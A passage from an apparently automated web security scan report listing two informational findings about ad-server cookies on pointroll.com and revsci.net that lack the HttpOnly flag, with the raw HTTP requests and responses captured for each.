Set-Cookie: BTA=GUID=4CEEBF00B4224B529E63931FA8A025A6; expires=Thu, 03-May-2012 04:00:00 GMT; path=/
Date: Mon, 09 May 2011 15:37:40 GMT
Connection: close
Content-Length: 4022

<script language=Javascript src="/ads_v2/script/btwrite.js"></script>
<SCRIPT LANGUAGE=Javascript>function BTAdClick(szURL){window.open(szURL);};var n=navigator;var h="";var fmnv=5;var fmav=10;var btf
...[SNIP]...

11.18. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /PortalServe/?pid=1233308J95620110310212114&flash=10&time=1|10:35|-5&redir=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBEgMLqgnITYDyDaXRlQfxr83UCKTwo_oBvMa13hvAjbcBABABGAEgjfDlBTgAYMmGhYmIpIQQsgERd3d3LmNzbW9uaXRvci5jb226AQozMDB4MjUwX2FzyAEJ2gEhaHR0cDovL3d3dy5jc21vbml0b3IuY29tL0J1c2luZXNz4AEFmALADLgCGMgC5In4GeACAOoCDjMwMHgyNTBCX01vbmV5kAOkA5gD4AOoAwHoA2voA5MF6AOYA-gDiwnoA4wJ9QMCBABE9QMgAAAA4AQB%26num%3D1%26sig%3DAGiWqtyodj_3eco2oOZOH11No0LN9ZNq6g%26client%3Dca-pub-6743622525202572%26adurl%3D$CTURL$&r=0.18015406071208417 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PRID=B313D3CD-2147-4ACC-A03C-CCA65D06F94D; PRbu=EoSNMBpPq; PRsl=11042210442417319321424330526S; PRvt=CFJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAe; PRgo=BCBAAsJvCAAuILCBF-19!BCVBF4FR; PRimp=D9A20400-8E82-28EE-0209-AFE0003E0200; PRca=|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#; PRcp=|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#; PRpl=|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#; PRcr=|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#; PRpc=|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 15:35:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 4400
Set-Cookie:PRvt=CGJBaEoSNMBpPqAI5BBeJUpEoeWZPXI2ARGCAeJo2Eonlg6HlnAEZCAeJozEon0qBOtv!FLBCeJpJEothAYwPFAxsCAeJjUEotmVlODIAEcCDe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BCBAAsJvCAAuILDBF-19!BCVBF4FRDVCFUE6;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=D9A20400-9495-C8E0-0309-8D40011C0203; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKLC*1774:1|AKTy*9203:1|AKRD*2017:1|AKQh*130:2|AKQf*282:294|AKTa*130:1|AKVY*127:1|AKQk*1753:10|AKPE*832:2|AKN6*527:2|AJvt*77:1|AKDp*36:2|AKOh*27:1|AKRt*47:2|AKOA*1753:1|AJsL*1753:1|AKGw*2017:1|AJvr*1753:1|AKLp*1753:2|AJcC*23172:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKLCAA2c:1|AKTyACY1:1|AKRDAA67:1|AKQhAACG:2|AKQfAAE8:294|AKTaAACG:1|AKQkAFiH:1|AKVYAACD:1|AKQkAFx5:2|AKQkAA2R:7|AKPEAAN0:2|AKN6AAI5:2|AJvtAABP:1|AKDpAAAa:2|AKOhAAA1:1|AKRtAAAl:2|AKOAAA2R:1|AJsLAA2R:1|AKGwAA67:1|AJvrAA2R:1|AKLpAA2R:2|AJcCAGBk:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FKqE:1|FWcL:1|FZsH:1|FYnl:1|FYnm:1|FVn1:58|FVnS:59|FVnT:59|FVnV:59|FVnU:59|FWau:1|FW9s:1|FW9l:1|FY3g:1|FW9r:1|FW9T:3|FW9U:4|FOLx:1|FOLw:1|FPoF:2|Eviz:1|FLXe:1|FLW9:1|FODi:1|FUZr:2|FOn5:1|Etxz:1|FO2m:1|FCbK:1|FPLN:2|Eoxl:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GKwo:1|GLLp:1|GMjB:1|GMEZ:1|GMEa:1|GLEi:58|GLEl:59|GLEo:59|GLEp:59|GLEm:59|GKw2:1|GMGQ:1|GLZC:1|GLZE:4|GLZD:3|GLZB:2|GJTv:1|GJTs:1|GKTE:1|GKTL:1|FzvF:1|GHhF:2|GJQB:1|GKwB:1|GKvy:1|GJsu:1|GA7A:1|GKDl:1|GJij:1|GDVY:1|GKCp:1|Fy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FKqEGKwo:1|FWcLGLLp:1|FZsHGMjB:1|FYnlGMEZ:1|FYnmGMEa:1|FVn1GLEi:58|FVnSGLEl:59|FVnTGLEo:59|FVnVGLEp:59|FVnUGLEm:59|FWauGKw2:1|FW9sGLZE:1|FW9lGLZE:1|FY3gGMGQ:1|FW9rGLZC:1|FW9UGLZE:2|FW9TGLZD:3|FW9UGLZB:2|FOLxGJTv:1|FOLwGJTs:1|FPoFGKTE:1|FPoFGKTL:1|EvizFzvF:1|FLXeGHhF:1|FLW9GHhF:1|FODiGJQB:1|FUZrGKwB:1|FUZrGKvy:1|FOn5GJsu:1|EtxzGA7A:1|FPLNGKDl:1|FO2mGJij:1|FCbKGDVY:1|FPLNGKCp:1|EoxlFy9A:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...

11.19. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?record_activation&rsi_dpr=1274605-56918-315889-1268392-317325-1198035-1049794-1238051-74560-1086373-1196055-1264419-593881-1215295-1086372-1086371-1086370-926097-1086369-1196051-1147048-1049851-1063912-1063916-1166710-1063911-1063910-1215322-715901-1023315-725071-109108-75921-1006093-86237-1006089-1049785-1086731-1049788-1086733-1284585-1044410-1077940-1093100-397181-1044578-1041270-1049769-596293-1049770-576685-1044587-596291-1049772 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.usatoday.com/weather/floods/2011-05-02-ohio-mississippi-river-floods_n.htm
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; NETSEGS_I10982=bff01c00ddc153c5&I10982&0&4decdd8d&0&&4dc76d7a&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4decf25d&8&11797,12348,12360,12390,12566,12572,11854,50049&4dc75d7d&271d956a153787d6fee9112e9c6a9326; NETSEGS_J06575=bff01c00ddc153c5&J06575&0&4decf417&0&&4dc77286&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4decf45e&6&10124,10098,10078,10053,10100,10143&4dc74a5e&271d956a153787d6fee9112e9c6a9326; rtc_4-db=MLvn9jM1Jgpr54aeixlPU0iJzD/A1gw/s7z5FPHjTbcjQe6SyjZfNBHlcl0kJ6xb7KxXS0n/wkRC4loA/0F2wkRHZcOAJEq4Dwzt2Om/1LFFe33wUlIYHWgk3JIf+57YTIrZsByUWltzFrRLWQkJwcRM8WAjEeY4ROXqVRqWqlFCk3HzeZvB7UqDKiMm+em65LEdFCubQva+uhYCU4TAdQsM9NhX+ug+P8ELz2+3GiBBzM1wCymg8+GPH7Y69+xviE6Hqdz7ujIwlbK5VxRJUDXsPScW0OuLen2n5XNIVQWV0a6zZscEKSvJFJ+qcEq4+Z9S+ATaANDLtiqSIrA0MATfpgfCqefcfJ5CLtyChbBOQcNQdYq/ZTXHQ2nKTygG5ksEGSLhhMLTH3nLtfSmf7myMaOLY9aJ02OHl/Fu6Y2wQS84P004/LHAfRc/BEHwKgDZY8E4JJEL71uMwA2eeEdPVYKPG/DduFctll24uU8j2YMNsWENRh4hK5IbB0czI2gWw5thigBcBZIP3XJrVHNnhsObnvvXwCKWWfWdYI3v4TRgyMWKw6d8zcNUriJHuzJ6gN4inlSjVhNBgUR06cCYuTzRv8kU21/Nb5c0ZNbuKLudEWUgq1+Mw5po5VTwWXV0xjFGISH481xxkQrS9f+z4zfknHQSyR966h01FYMsS7zsQtcKlrarNO/PXZK/VVXoeRIalnaoFkvriwrBt9uojqEElV6GOWaCOj9t8u2MX6+ewAiFR8qEF4hCbHQN2w3i7zZxx9jglR+zktHHdI+AaME6nwVOuSWRSMmbBOJQiBGVEKcZZtrixm6A0EkvkXGQhi1mkiDJt28P6lC1YPWnqEjsa1VFxuyj6OhVtpRJH+e2y6R4/cnzJ+CfcLnbecp3jLkBN3A9WKkj160OlWZ6bQrrtnaiNyLK+hjDarrW1/e7DkcyYpLMH7VZ0PoS679JljmXMuDgV63vGcd/l2Xeq07wDl5+804DPNFxxXEWxZK2JxenUyorOZ05lAucMiUYnwDH43x2r3zq4+jzvmUOijuNnDDQC6c2U37Xp4k3g6we4z0Ry3aft2vhGeNZfdQa6KWZJbHpsiIPOCcIXMd7rRsTytymDxbBcSdJSOF12B9Pjw5Zd4nETw83mqHLJNXb+avDtVTPJTZvtMw/WF863sU5PyifACD+WfVm7plRes9cpmKCPcJQ7KvRISbVPTZwwZPbZ+ibDRrmqQ75C3n12yoLgcMTFwwpUXIE8ayLlistW77NupnYkEPzdtEpAoN9Gh3vRGfHy0oQz19wzUQqJlA28pDJ1tX/7iOBCPg6ZY5H+poLDVjrVtXfWnmVV69M+2ceRBwsL9kP8Sh4kd0vsFLne73RkEScWjpHV7/ppEg88FcDKahaMhEZyiRDsKA570XuyQw+UqP5VTXr4GySHBYP6zLT3+/tCziDDi6NClG6rdihdMlrm4QYe4xpq3GPbtAWr82gHnL3YXN2W2EYYdhilT+MNpndsp7h20igjE/HbpSLspAok9tNFXqbEYlOwELgS+lv9Ifkr2X+d0pgrqiQQ0d9l6fgzE+vTxRX/lSqhrDbZ8AP5hPvWP8yU2CWGjyJOp+IQMzxLbCeyMUCOswZyF9Szp3O3Ji1sOZtE3XxCc0gQdRJoaas/cK6jDrj+Zn0IMRafowVEGLGJ68i+1GuK1MUVVnvoLFt0mEIVuYfpXQ0Ox3EP6fd4MwQt7ZSlCzlXGh+Uyu5r2kFhlZQi9L/2q/8uNAomOxLyyaFNZVc6DYQZk9rPmOUl/1BLQsf1hbETMCwzqBObuJhhJm/LMoMBrGq/Uo14rgZ/IiEUZxD2wQsnkg4zyIS9BU59fSAJXFKHCXXf9N00ud61sG4DWv4Y9jKKolUZ0s/uTUq3gugjF+d; rsiPus_j6zu="MLsXrqMOJjhroJB0OsFGPziNFPNiun2gwhaoALt57xKhmoM8agSQamtihOB9JrGlJ9U5Glrv4IwkOYq8vCgKRqJJ2Vthfh44y9doeylTKKNxTEgwZ0tUDW2eYv61AYwLDVnDfXLH7JG+gLUN2cyzNQmzFkyZrPBb09ScoTgIFKy+VzvZEh56Mot8j1jmS6F0EJ0Vd56aXqpwHitTgyFZ0Tgfsu6X72q5G4VqGA5WmkzkvyYbs9U5n6CfnPViCFHLgmTHka96/tVahWRDt+loXAtoEMCIAILvAWLMdVxULh2UAJrAJ7WH7YfvuXvv0fAWzeVorhAZsmDTeEs+vxwXkO9CyOpiXO89nCPHnTtutAk8luR+G+tifbFHAuAlHhRjFMF5keF42fRwUXnDG6sHRZKgIgNuGOArxKB3mvKLeJH8yR9yXNasKO6go652tWyFs2CQkdF2IMUDU3eSKAct4pjTs3IEFH9uwOqVrCCo+x1ir8vTa+5USm1joacLN2msLrMgH18nZ8DvKXNuOCPyclG9Vmk/l1oicJDWZA5jjIK6w2jWlTN/p6SbP3LZtOMiwOj6U2fVgJJqaGYY1XMY0zku7MaQjyGRAtY+ZmU/DCzMw7xsnRfKOnn4m7xt8pKSSoGAniMLko210UfG+T4Tts4/UAmISYbuc9YPfsE3JnJDCCMrSL109EjE41WyWul/8KbBdqdKc4gBhkZXCS9G90FIrZAyESpQq/u/4lcEIiEFEMm0kZqmDjg/yd/rP2bUoesg50Qqa2bnSXTtHOZkySNUg7o/zripht/uuixLWgOWZEZEFg9BOvDt1hV0YeRchLnulIDchNxF/d6Dfdk8XUO8zh4yhRDxxy4kVbxFNxFkXuZLttj2yEfnTXhDMnA2QMt2uMwEh/5A2d69N3djka9cbMFEB9JYW8npVgr43K+Wbhq6yqAjliUUHpKVygERKwWrweJbTkcSpXGiZkU/s5ijv6Lcnfu20OXiNSXZ5Dnmd0UlnP/Q/j5F/7Vfe6n6/KR+B2h8T59lJFwNQz/s8wVhZfIdPTxpWqh9S8opaQqUxN7gCNpeF6U7dw=="; rsi_us_1000000="pUMlIz9HMAYU1O2uQ6agQvHto2eq75IgYszgol7C7yspOc4TfCNog8fILX1SZNuyWxzrk3bzeF6RGNsvywqVnLs8ZV8tHCwYDbDnHA9KDGR/2p3ZsUoP3QRkponkl0tHXd2tnn1ll9D0gxCO31q5lA44TjimSdK75IPGwn80EAbmAkiEQ1NW8r9XVazY3Aa0ZgQI7CeIdRzQV+8YwH7fXhzTAu6r7VYossSs5gGqRRy0tpBoZB/n8X+efR1dF/rfrSrFfx6P0rWcNIb+ahHrYGLlC2ihfhPP3O+Jvl7SsuEFIjV5F5W37w+Ngl7n1EDps4hxEBHOYnDC8jfXtjV7LMICIl+BeVVVg+dlJlFsYNcPuAi/lwJ2RUK4qNzFKTfEZf2NdPTjIF8m7bq4sfze2kt2X9cL2By0nkTggOA8Rhhzk+g02M5QgiowKy2VuivgjHrAHKifaMb6++L27UZKtgs3/H69LBeRmX/ruNTtaGvPlsWGez8YcjoTSN1nViHeDdA94hHJh7PuPZZI0FkxHCCuo5QSKQGFFpqHzYtYPuZx5AYJ0ZRcb1UbdMNL+UHbpCU3ImHbEfOz075jyEHLXIpy65u7NnuOhH7A2gUkqI8X869fYQ7B1PLibiaYGlGkugk76lf8FDefFHxnOhkvw0h+Zzi+7/dVfgUbOEjTKhpv8IuitSf7Ae9warLnboKUNf9z/Uv4+KpuTET119I7oG19H8uhClb70f1+BNWGmCSFQO2fX1KpA00LffkrjsQRk0fqmCqz8hrPblcR84IJyr8mZUI+xZrbX1PRxebOx8WR81e+wVQrYJ64tbGSgM4dF4irZ5SazLYqeYju5ZkzoeeUqC0kPbhAYgXhRly6dV7AqFIWS7jp0JwuTqrMqX9FMAN0qDaJWtIevOCSal5ifcCn+r/i4thjnRNLFwTLVesGnSkyEJZ/sE2T89wTG0ZJZHwH2IIscMcArFiwk0zpa/zAt7BLfpfURhHVmWEmP9mD9URaYMTbBDCOD5qEEZg/WqwhHpBOXZfhIVqtuOeQW9XH4qQsjQTzfP3Tfjh5pZkxtEjOQg0vnGuPeeVK2k47liBgtx602AH4FsuDCNPPnl2N9S3b6Se9s4QGIrVR7cibb+oLlJPhtv82E2AYb2JqcT1MYT/epHc2tSTheeVbvF+igVHOQxLLqbwLbCwkqsV0hbi2fv9qScoJT/WzFTlFzDm61B6UYYmjpsQO0JkUPGWXH1lhIwYgW601Wju2wHcWJJoprlhGo237DLuozEfVATLqnMZx4aFkxiOnaeNV3saNTaTVCH9jTzgAYcB1OixE63aW7kHNf9yyuG53mJ5Aa8s0lrI3uvr/+vFPkMcyppj8vriy5viseKKo/bztHFB9LEOYHDPRIwAioNiOj1brnge8EsnFDr6aUX2wryxQ7tqLBKTr/wvXQi/1S0CrcSEQ4vw1utWrEm7wHaaSRnn8GhOAyMwnrmXOwJ/gaLrP2p8bLBIxkr/8jxUvF2Tm6BsO7OU5FitN37LNXKUpVsA="; rsi_segs_1000000=pUP148OheHIQT7uItGF25jD9Qs21FubrqKatUkMCrzQ0ubO+9OJEqMBPaqLOnUT/0qbgJHZjnVOLUUdh6W5yO8TAHKWrnEIdrGwwkcb4cnFgczDjCdEcEfCAH9QV9gQfhWUU9eUW+1FmHy81movjmb0OshD6JD75y82v21Zpze/U7TG71KUw/EK8Yk4YFbDkYA9y3wz0G7nvTcfLT/GhJZbKN+yRVh6IJYpuMdXAy8638GeZS/vL4PGyPCK7mYGQ19yvvEn6ODRVpB63vByr0ab/JGpwhV2j7V2Opbn62TlTV9Ep9v/KTJXEEh7xjIfNol2mtVQjP2qXlQ+5DYZWBRe8B3uT46yKVM63Ue8Iu5VB+nAPlUpvE0jiE6Qs1H1n4r/e/jSmPGPvWra/g1Iw52oGpr3tDAShXZ6leem6wkl7YAlKXY0ikpCZDduaQh8UBxHMax7jHTGLCHPzt/9KYUF1eK3tc2bRu/gWIv3wnbCQR0aqAnlKC5c4DCTSJDvyAlCmhJOuf6ulIfr+YiVUcmyunKjbPTY9z5DoFVXvb00tKIO72DJ2R8xXrHfHLknf1Ii54LJ0bnhi+0Drv+J010Vz7CoOOk2kLw==; udm_0=MLv39C8JZjpr557JwPKJHPJjVm4nwNDnfaGGn5a6X5EAwsYAqmLCTArLHxzvFq5u+Lwe27lFrnW5WnLyYnzoo2vLyODpQWYkRuTiRRYobugWhdDPREK16g3CZk+J188bp8ISFFatAM3Pns+SxZjcme0C5dGxc6XjkDqd2T0pa9dLHJ2FzI7NAP8Y3TWU6n79EJfmzJu3rY1n/+9COKH0vUGz5d+gBTEXGF9NJj5hemDBJLfP5Mve+4eWzxiCmeffHI22qESrtLERd9bn/jcndKQB6uiKK4So7g9BbnKF0XRvZf92uEkD8qlmEHlK4lIeI2xMlprKnNbUbSb3joEj3FnW5JiRUPydReZtf6pQR8m3Ri7k5yDwmeNfkO8orvSZb6NKA+T1I2i2V6XQzYiQYT7eMO3GqA60kr6kRwLqPUZJh32H0PqK8oG4V09T9ctbP5mf0Cpnf7vM/uRm82tz4tfks3zBm+3VbTk8I2zhyWS6eclEJACmrM7XMGAWGJq9IYqsF5S5jpHtbcXPrz3rT2u/LIbFzVO89TolW1hVi5tuk1KUABx5m8qzMPhX0+EPauUMSwzeirm98AcAwtXpvonBgEzaZNv2Urt4Jvxfo27TOyFVxFu1bqmEB8413oNdEsW2gdv/YdJUYkcRYMX2OouTQyfY7vz4Tk1pzbkZa4TH2fiVXxOBEHyM1PbD7qSJcQNPo/dKaL6Xo4fqVV4AgIYlpYTjce9ZivcrOnjpRG7y1agYfbTDamrwnGARUfl6KEBM2ZiTeG2Th7ZCT0C8b1UsKmbxGVTaXBZ0wNsjxp+YZtltZqx3sMJbKGl2M6JUT6+b1g+/D1somt33fPhno2ShrlBRxI6Xv1/126vVfr+8VkGpzsDKbLnLLRElobnNFfygMUp+MSlGp0ZpUXAvzJAJe6qk57o+tkwtb6z5N8ucTzNpi24DHsutM6dmIDxOQAEglp2zZKqN9AIYM1hElTbq+zc2ohzuOYi/5VTNmVJFdmfV8jGoZvYmCAQ6vc7v/bKs8HK5EM7lr6YKr1a2uMELEu4ITAE3gqlVLuvjVYDva/Vyw8YXKa6Rcxml6TjwSCRaUcVyyk4zt+bzX/O5hCc1ojBZDEcmWPNvSp54wrCDS4hVeNiCVinCDJG6X2Bjb2NCbb2UOFUa6jFXwyrlYAC2eXfnV/Mp/ECcH1f7yr2pCGP+gzOfRcb+maYO87HFqFqU4o0hCg0HRA0UycAov4CmqZEBFk9dU8+gDkkPGgmct04RsyVbsrfpoMoCycEvYtBXhDyOthaY+BDkp+ARJu6+rQnmkr7eDZA/vxRM/N95y1VMmE3Myc7FTLdYW9C2xtVHZuzUtN8T7qcO9QIsvEkMjKo+DNeeo4pM/11JcWfLwh92IBgieCHi9XyUEKsOLp7OEC8kbLOjAcAIQQTa7WkkQG8T3O/kM3JB9V9uND5mY70Sow7PaIYpx0O7Aoith2eiECyyl7+6y5j3d22MjOVScy+6Y7Ldz/U1I0iJwoYRzcFyf2mcYOebzis=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_j6zu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_j6zu=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_SkQn="MLsXrqEubghv55A4WwmsZyXO5VhPENfdPIyyQLscELmCG0fTLlTekGbINSJmbIu0d1ubB0nyDTyxcOmdBQabZa45Jb41Tm7kSmB6OEnhTApzesR7XuknUQy48mrMwW5onYarHwBNKshMKjS5CCO5r6LK8KdPXJ6XR1DOuBII8Z2GlRuVWNK327jftnuLNSMdgk9+E5PT4cn0i7NwkYa/qtfcSS1y5BKyvIC54WQm9Vhjo/KWdDnA2SF0GED+RMilpW+j8TZ0JhRT/1WQzqA2Jk0RG+DpxhutzssDYSYk0DX3DgdnJjR2axK/qoDvYQ9yQ+UxBg9ngxYHKM1ftmej/RgXdE6O5FS1L8pF8Jo6y2rR2Bb/YX0L/Aq8i0+dVwmeO0lIGti11L3qjCxH9wBllNaocACV9BAE3PxtWLtqfpUBnXnxdnekOdqTIBMbGlgJcBaapslAmwdjmRqmdxh/pnnOlysVOcfkOdUemgTzO5+wdqYzzV6LvgLRwb4hO3+HUJS4YtIGknuktPToYoE3w2wKJnhncNO703XIDqnj9j90KxMSkws1tB5FJ6WjYwJIziEBYUlfxiWZHQtlHa2pRIZ5S9/Gi/ZIeb98XxEkakK9w87x/JBldFW4WcgNWd7XtzKIWRqc+i++6ovbZ4wDQmS77gB3/rP9/myJT61CHZ7jQ4epQrHqPzcJZngXL/qJ7yyEs1nRnTefyPu/bSboSw5TVMWO/Ww5cVFQn5rwqSJeQKWR3GHRJxbYV8bvVWxpkzja+ks41Gn+6S7sam3OWyeu4VImQLc4n7Gfk6nvUkOCJFIrMFLG/Y4b7S6bCzFfRDotAXon589paelpafKrOV5zB30NQcdANZARkGvAzxxDn2DbmX5JHlL44F1UPI+VMU02U5vHZhZ+2U0bUZ/06/W3F69PZ35ywmxYrqVvTMenmYMnbyBPFcUYiCeye30lPQ5SqUBa9LeWpKvYnFxR1EEoN1ZkHAun430QzoW0dXnSBhx2gdS9oRHvcztz8YfN5Vyrssqhuuf69u9UcWYCJo365C0PxYeGC0MlAuhLXSiY3oAp9fJmGwgzUczzg3mmBk+tUKO8Iiw92/sqIQZ8EjTozsV6s4wu1prwzQljTlTABvFXBGYpUROzA7gEhHK9zsJRnrfKFZeQWhq3Ud4="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMtIzlHMAYY1A3HkAz1jwtCTPvDvwQSU2eqPpzA6n4Wsm7TKYqfaBLrtKN68iFx8cqmHSK9eaFvyn1GBw+6JWsXYG7aiq5FNZQFDVoCY99WgD0ZgDa+0zJlpokW8XVCy6y+Du/jrPBBg5yM3rO4tbi0Jl6FICf37NqIiuoMM7wt+E/z+22JNFn5VC6+LZSDwDXQ3As6Hl4R0C88RDVi9DAfBOxCVcg5yQKzAzoJIxp5/DJhO+ECGd/+VhmnIJDcusTsL/Ap/dyTs6piINyXjT7GuUPfT5sWHu2YkGLjgFzp+mon0GfRWbMg5jjBb9eSoO4gqfuNwaHf8ptc5OMhhuoyIzauw3c2jGIJcGLi77azqNo8SRMj2N82tZoGqbdg7dvPzygrnlSHG02v6+PV+3yxUC+fY58JeHxNBAkt1Z2as2mV+DknpMJbs5WCe0o8nRRpDdzhrMEq2mXkpOUsgKnKP1zw5h898+qPYuRBNcbUL1GyI7Kw8tiOs0erpnIilKw6JJ3ZGnP3lU7HTdrglwGlxfvR+i6XUlKbq9lMO+OvTy0Pcq8+dXMiy6SxCttj0c9iVhgTav+qok/isEHRdALDF8Qc97MCaA5xhIpv2nth2l8UJ7TzAZj633oH3fd1GDzCmvqoctSZ91Z+qQoLRnFNEaqi8MjJYRYtz42KTrVXBKwLiXioap9Dw7pICla4/bAo5SrutPrAfFFXUxRjihk3ZRQijldc8xotPMoQVqj60x9i+mrzLwL0gE0tBVsImrybLZ7cq+QyYtg4YvKXUPEntPGi24XXFKvcdyEH0pys/E